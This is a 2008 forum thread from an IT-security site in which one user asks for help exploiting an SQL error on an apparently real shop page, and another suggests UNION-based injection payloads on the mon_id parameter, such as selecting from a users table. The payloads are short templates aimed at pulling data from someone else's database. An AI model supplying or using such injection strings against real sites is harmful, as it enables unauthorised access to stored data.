|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 61
Members: 0
Total: 61
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SQL inj Error |
|
Posted: Tue Jun 24, 2008 3:23 pm |
|
|
w0rm |
Active user |
|
|
Joined: Feb 22, 2008 |
Posts: 49 |
|
|
|
|
|
|
|
hi i need help for this injection , for this error SQL
Code: | index.php?pg=1&mon_id=31&lort=6a |
Code: | 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 0, 40' at line 1
select p.products_image, m.manufacturers_name, pd.products_name, p.products_model, p.products_id, p.manufacturers_id, p.products_price, p.products_tax_class_id, p.products_quantity, IF(s.status, s.specials_new_products_price, NULL) as specials_new_products_price, IF(s.status, s.specials_new_products_price, p.products_price) as final_price from products p, products_description pd, manufacturers m left join specials s on p.products_id = s.products_id where p.products_status = '1' and pd.products_id = p.products_id and pd.language_id = '1' and p.manufacturers_id = m.manufacturers_id and m.manufacturers_id = '31' order by limit 0, 40 |
thank's for . . . |
|
|
|
|
|
|
|
|
Posted: Wed Jun 25, 2008 1:56 am |
|
|
gibbocool |
Advanced user |
|
|
Joined: Jan 22, 2008 |
Posts: 208 |
|
|
|
|
|
|
|
Hmm I'm not too sure here.. but i can see a few possibilities.
Code: | index.php?pg=1&mon_id=31' UNION+[insert your query here]--+ |
Your query could be SELECT+1,2,3+FROM+users
etc.
If that doesn't work then they probably are escaping the single quote, and then im not sure where you can go from there except trying some random things. One last thing that might work
Code: | index.php?pg=1&lort=6a&mon_id=31' UNION+[insert your query here]--+ |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|